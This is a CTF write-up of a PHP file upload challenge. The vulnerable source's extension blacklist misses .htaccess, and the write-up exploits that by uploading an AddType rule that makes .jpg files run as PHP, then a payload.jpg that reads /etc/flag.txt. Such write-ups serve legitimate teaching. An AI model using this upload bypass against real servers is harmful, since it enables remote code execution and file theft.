Description: You know how to upload files?
Note: Flag is located in etc directory
Do not try to upload rev shell on web challenges there is no such requirement.
Author: x3rz
Welcome everyone to the File Upload web challenge writeup and I will try to explain it from a CTF player perspective.
By visiting provided URL. We have our file upload web interface
As a basic web ctf solving strategy we looked for robots.txt which is not available on this server.
So after so many tries, you will be able to upload jpg or any other format but not extensions that could give us shell or anything by which we can read internal server files.
There is also one more thing in basic web solving strategy nowadays that is checking “.well-known/security.txt” challenge creators place sensitive info in them because this file is not really well known by most of the people in the community because it's a new standard. You can read more about it here.
By check the security.txt file we can see there is an entry ‘/backup.zip’ and after downloading it reveals the source code of index.php
This is the PHP content of the file because we don't have any business with HTML content.
<?phpif (isset($_POST['submit'])) {
$target_dir = "uploads/";$name = $target_dir . basename($_FILES['file']['name']);$ext = strtolower(pathinfo($name)['extension']);
$target_file = $target_dir . basename($_FILES['file']['name']);// var_dump($ext);
$uploadOk = 1;$blacklist = array("php","php5","php4","php3","php2","php1","html","htm","phtml","pht","pHp","pHp5","pHp4","pHp3","pHp2","pHp1","Html","Htm","pHtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","jSp","jSpx","jSpa","jSw","jSv","jSpf","jHtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","aSp","aSpx","aSa","aSax","aScx","aShx","aSmx","cEr","sWf","swf");if(!in_array($ext, $blacklist)){
if(move_uploaded_file($_FILES['file']['tmp_name'], $name)){
echo "<script>alert('uploaded!!')</script>";
}
}else {
echo "<script>alert('not allowed!!')</script>";
}
}
?>
So here we can see that this is a huge blacklist blocking almost every extension that could give us shell on the server.
Hmm, have you noticed anything? blacklist doesn't block the .htaccess file as our running server is also apache so this is possible that the server is using this file
Let's give it a try by accessing the upload directory 😜 (just a test case)
So now we can assume that they are using access which narrows downs the challenge objective.
If you google about htaccess you will be able to find a method by which by uploading .htaccess attacker can get remote code execution on the server which is performed with the help of adding a rule.
AddType application/x-httpd-php .jpgThis rule will make the server treat all .jpg files as a PHP script.
Isn't this cool? 😉
So enough of gathering information now let's jump into the exploitation part
Make a .htaccess file with content:
AddType application/x-httpd-php .jpgMake a .jpg file with content: payload.jpg
<?php phpinfo(); ?>So now let's upload our .htaccess file and then .jpg file and access the paylod.jpg.
We can check for disabled functions here and found out that the files_get_contents function is not disabled.
So final payload.jpg
<?php echo file_get_contents('/etc/flag.txt');?>So this is how you will read the flag stored at /etc/flag.txt
Hope you enjoyed this challenge and learned something new 😉
If you have any query then do ping me on discord (x3rz#6901) or Twitter (x3rz0x00) or you can always find me on the Vulnfreak server.
